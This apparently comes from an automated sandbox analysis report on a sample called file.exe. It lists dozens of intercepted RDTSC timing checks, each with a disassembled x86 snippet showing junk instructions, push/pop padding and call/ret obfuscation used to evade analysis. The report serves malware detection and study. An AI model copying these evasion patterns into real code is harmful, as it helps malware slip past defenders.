Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91247 second address: D912D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D2FA9h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F8CE470D048h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 add ebx, dword ptr [ebp+122D2F71h] 0x0000003d mov eax, dword ptr [ebp+122D0A3Dh] 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F8CE470D048h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000014h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d call 00007F8CE470D04Bh 0x00000062 cmc 0x00000063 pop edi 0x00000064 push FFFFFFFFh 0x00000066 add dword ptr [ebp+1246AB93h], eax 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8CE470D050h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D912D9 second address: D912E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D912E3 second address: D912E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9461E second address: D94624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94624 second address: D94628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93689 second address: D9368F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9368F second address: D93699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8CE470D046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94850 second address: D94855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94855 second address: D9485B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D963AD second address: D963C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41B0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D963C2 second address: D963C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D957A2 second address: D957B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D957B9 second address: D957BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AE71 second address: D9AE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA0931 second address: DA0982 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE470D046h 0x00000008 jmp 00007F8CE470D053h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F8CE470D05Ch 0x00000016 jmp 00007F8CE470D054h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA0191 second address: DA01AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 push edi 0x00000008 ja 00007F8CE4DC41A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA508C second address: DA5090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5090 second address: DA50B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA50B2 second address: DA50B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA50B6 second address: DA50D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA085 second address: DAA089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA4C1 second address: DAA4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA5F7 second address: DAA5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA5FB second address: DAA624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CE4DC41ADh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA624 second address: DAA636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA636 second address: DAA63A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA63A second address: DAA672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8CE470D056h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007F8CE470D046h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA819 second address: DAA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA824 second address: DAA82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE470D046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF3DE second address: DAF3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jo 00007F8CE4DC41B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF3EC second address: DAF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF3F2 second address: DAF413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8CE4DC41ABh 0x0000000b jmp 00007F8CE4DC41B0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAFDA0 second address: DAFDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAFDA6 second address: DAFDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB364F second address: DB3653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78096 second address: D5EFFE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CE4DC41A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F8CE4DC41B2h 0x00000011 js 00007F8CE4DC41ACh 0x00000017 jns 00007F8CE4DC41A6h 0x0000001d nop 0x0000001e jmp 00007F8CE4DC41AFh 0x00000023 lea eax, dword ptr [ebp+12479E18h] 0x00000029 mov ch, bh 0x0000002b mov edx, dword ptr [ebp+122D2D64h] 0x00000031 nop 0x00000032 jmp 00007F8CE4DC41B8h 0x00000037 push eax 0x00000038 je 00007F8CE4DC41C6h 0x0000003e pushad 0x0000003f jo 00007F8CE4DC41A6h 0x00000045 jmp 00007F8CE4DC41B8h 0x0000004a popad 0x0000004b nop 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007F8CE4DC41A8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 00000016h 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 movsx edx, dx 0x00000069 call dword ptr [ebp+122D3369h] 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F8CE4DC41AEh 0x00000076 jmp 00007F8CE4DC41AEh 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78594 second address: D78598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78758 second address: D7875E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7875E second address: D78762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78762 second address: D787A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7BD17684h 0x0000000f jmp 00007F8CE4DC41B3h 0x00000014 call 00007F8CE4DC41A9h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8CE4DC41B0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D787A0 second address: D7880F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8CE470D056h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F8CE470D055h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jc 00007F8CE470D052h 0x00000023 mov eax, dword ptr [eax] 0x00000025 js 00007F8CE470D04Eh 0x0000002b push eax 0x0000002c jc 00007F8CE470D046h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7880F second address: D78813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78813 second address: D7882E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7882E second address: D78838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78AFE second address: D78B04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78FD2 second address: D7902B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F8CE4DC41A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 0000001Eh 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F8CE4DC41A8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov cl, 3Ch 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7931E second address: D79322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79322 second address: D79328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79444 second address: D79448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79448 second address: D7944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7944E second address: D79469 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE470D04Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79469 second address: D7946F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB394B second address: DB397B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D053h 0x00000009 jmp 00007F8CE470D04Ah 0x0000000e popad 0x0000000f push esi 0x00000010 jnc 00007F8CE470D046h 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB397B second address: DB397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3AD5 second address: DB3ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3ADB second address: DB3ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3ADF second address: DB3B02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F8CE470D04Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F8CE470D046h 0x00000017 jl 00007F8CE470D046h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3B02 second address: DB3B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3B06 second address: DB3B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3B0C second address: DB3B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41ADh 0x00000007 je 00007F8CE4DC41ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3FB6 second address: DB3FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE470D056h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB412D second address: DB4131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4131 second address: DB4153 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F8CE470D054h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB42B3 second address: DB42B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBD707 second address: DBD70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC74D second address: DBC751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC751 second address: DBC75B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC75B second address: DBC76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE4DC41AEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC76F second address: DBC784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCE4C second address: DBCE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCE52 second address: DBCE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F8CE470D059h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCE70 second address: DBCE8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCE8E second address: DBCE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F8CE470D046h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCFF5 second address: DBCFFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBD151 second address: DBD156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBD156 second address: DBD17F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE4DC41ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBD17F second address: DBD184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBD3F8 second address: DBD402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4320 second address: DC4326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3FB1 second address: DC3FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F8CE4DC41A6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F8CE4DC41B3h 0x00000013 jmp 00007F8CE4DC41B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3FEC second address: DC3FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC67BB second address: DC67C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC7E78 second address: DC7E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC7E81 second address: DC7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE2BA second address: DCE2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCD0E5 second address: DCD0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78E0C second address: D78E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D78E10 second address: D78E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8CE4DC41A8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F8CE4DC41B4h 0x00000028 xor dl, 0000003Bh 0x0000002b mov ebx, dword ptr [ebp+12479E57h] 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F8CE4DC41A8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add eax, ebx 0x0000004d mov edx, edi 0x0000004f nop 0x00000050 je 00007F8CE4DC41B9h 0x00000056 pushad 0x00000057 jmp 00007F8CE4DC41AFh 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 js 00007F8CE4DC41B4h 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCDFC0 second address: DCDFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1DBB second address: DD1DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1DC0 second address: DD1DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F8CE470D04Fh 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8CE470D046h 0x00000019 rdtsc
